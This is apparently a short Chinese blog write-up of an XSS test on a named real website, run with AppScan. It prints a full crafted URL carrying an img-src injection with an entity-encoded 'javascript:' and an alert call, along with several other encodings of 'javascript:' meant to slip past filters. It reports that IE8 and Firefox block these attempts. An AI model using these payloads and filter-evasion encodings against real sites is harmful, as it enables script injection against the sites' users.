xss渗漏试验（１）

xss渗透试验（１）

工具：appscan

站点：www.talk915.com

浏览器：IE８，firefox

方法：插入<imgsrc=”javascript: “>

通过appscan的扫描结果，选择

把appscan里的测试脚本拼成URL：

http://www.talk915.com/forum/forum_community.action?struts.token.name=token&token=G2TQIXRNK8P5ZD8YNR6A2YHST2P0JU7W&title=&author=&content=&titles=&titleType=&forumId=&orderBy=&excellent=&selectTitle=&page.currentPage=1&postForumId=&postContent=&postAdd=&postId=&oldForumId=&openPost=&postAudio=&postAudioLength=&postStatus=&img_url_length=64&expression_url_length=46&upload_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsUpload&download_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsDownload%3FFILE_ID%3D&pathUrl=http%3A%2F%2Fwww.talk915.com%3A80%2F&userToken=&searchWhere=1234>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(56165)>&forumListId=4&selectForumId=1&postTitle=1234

无论在把上面

%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;

改成

javascript:

或

%6A%61%76%61%73%63%72%69%70%74%3A

或

&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a

或

&#x006a&#x0061&#x0076&#x0061&#x0073&#x0063&#x0072&#x0069&#x0070&#x0074&#x003a

 

把上面URL输入到地址栏，各个浏览器的反应

IE8:

firefox：

不做任何提示，也不会执行指定的动作。

而这种现象的原因在于

http://hi.baidu.com/yushangren/item/ed6702819ccdb02b100ef38d

 

也就是说，IE8和firefox都对javascript这个关键字各种URL编码规则都做了正则匹配，从而起了阻截作用。